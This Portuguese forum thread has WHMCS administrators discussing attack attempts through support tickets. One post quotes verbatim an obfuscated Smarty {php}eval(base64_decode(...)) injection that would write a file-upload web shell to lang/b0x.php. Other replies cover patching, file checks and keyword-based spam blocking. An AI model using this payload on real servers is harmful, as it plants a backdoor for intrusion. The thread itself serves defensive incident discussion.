Ir para conteúdo
  • Cadastre-se

Tentativas de invasão em meu WHMCS

McGuyver

Por McGuyver
em Gerenciadores de hospedagem

 Compartilhar

Posts Recomendados

tekobr

tekobr

Postado
Postado

Esta madrugada também aconteceu a abertura do ticket em meu WHMCS, o "estranho" é que o ticket aparece automaticamente como fechado, não apareceu como aberto no WHMCS.

O IP usado foi 87.106.215.227.

O conteúdo do subject e do ticket foi:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

Como eu já tinha o patch aplicado não devo me preocupar? Verifiquei a minha pasta templates_c e lang e não foi encontrado o arquivo b0x.php ou algo estranho (a vista).

Como eu não tinha participado do tópico, até então, cai por terra que esse sujeito só está atacando quem participa desse tópico.

Link para o comentário
Compartilhar em outros sites
Visitante

Visitante

Postado
Postado

Aah Watson.. uehe..

Tenho que investigar mais.. vou ver como está aquele texto que ele enviou pro Marco, se parece ser traduzido ou não, pois Google Translate deixa as suas marcas.

Link para o comentário
Compartilhar em outros sites
edvan

edvan

Postado
Postado
Esta madrugada também aconteceu a abertura do ticket em meu WHMCS, o "estranho" é que o ticket aparece automaticamente como fechado, não apareceu como aberto no WHMCS.

O IP usado foi 87.106.215.227.

O conteúdo do subject e do ticket foi:

Como eu já tinha o patch aplicado não devo me preocupar? Verifiquei a minha pasta templates_c e lang e não foi encontrado o arquivo b0x.php ou algo estranho (a vista).

Como eu não tinha participado do tópico, até então, cai por terra que esse sujeito só está atacando quem participa desse tópico.

Se aplicou o patch não precisa preocupar com isso!

Ele certamente tentou e viu que não conseguiu nada e fechou o ticket.

Link para o comentário
Compartilhar em outros sites
tekobr

tekobr

Postado
Postado
Se aplicou o patch não precisa preocupar com isso!

Ele certamente tentou e viu que não conseguiu nada e fechou o ticket.

Obrigado, Edvan. Também passei o antivírus no servidor e não foi encontrado nada de errado. Mas vou ficar monitorando mais atentamente.

Link para o comentário
Compartilhar em outros sites
zanin

zanin

Postado
Postado
Se aplicou o patch não precisa preocupar com isso!

Ele certamente tentou e viu que não conseguiu nada e fechou o ticket.

Certamente quem tem um pingo de responsabilidade se preocupará com isso. Pode não ser nada, mas tratando de nosso patrimônio, para quem o preza, realmente ficará atento e tentará entender o que está acontecendo.

Voltando as questões, será que dar um ban nos tickets que tenha no assunto {php} e base64_decode ajudaria?

abs!

Link para o comentário
Compartilhar em outros sites
Cristian Augusto

Cristian Augusto

Postado
Postado
Certamente quem tem um pingo de responsabilidade se preocupará com isso. Pode não ser nada, mas tratando de nosso patrimônio, para quem o preza, realmente ficará atento e tentará entender o que está acontecendo.

Voltando as questões, será que dar um ban nos tickets que tenha no assunto {php} e base64_decode ajudaria?

abs!

Tendo ou não, quem deverá fazer este "banimento" será o pessoal da WHMCS.. Pois como sabemos, o arquivo é criptografado com IonCube, impossibilitando alterações

Link para o comentário
Compartilhar em outros sites
zanin

zanin

Postado
Postado
Tendo ou não, quem deverá fazer este "banimento" será o pessoal da WHMCS.. Pois como sabemos, o arquivo é criptografado com IonCube, impossibilitando alterações

Digo em: Setup >> Spam Control

Pois pelo o que vi, o Matt está muito confiante no patch dele... E confiança demais se tratando de segurança é um problema.

Link para o comentário
Compartilhar em outros sites
zanin

zanin

Postado
Postado (editado)
Ah sim, mas aí teria que saber se o controle de spam busca apenas por aquela determinada palavra, de forma geral, ou avulsa...

nos testes que fiz, se tiver a palavra chave no texto ou no assunto (depende como vc configurar) ele já nao cria o ticket...

Se vc cria a palavra chave "teste" (sem aspas claro) como assunto, e no assunto está: "Este é umteSte" (por exemplo), ele já não cria o ticket.

Editado por zanin
Complementando informações
Link para o comentário
Compartilhar em outros sites
Visitante
Este tópico está impedido de receber novos posts.
 Compartilhar
Ir para a lista de tópicos

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Concorda com os nossos termos?

  I accept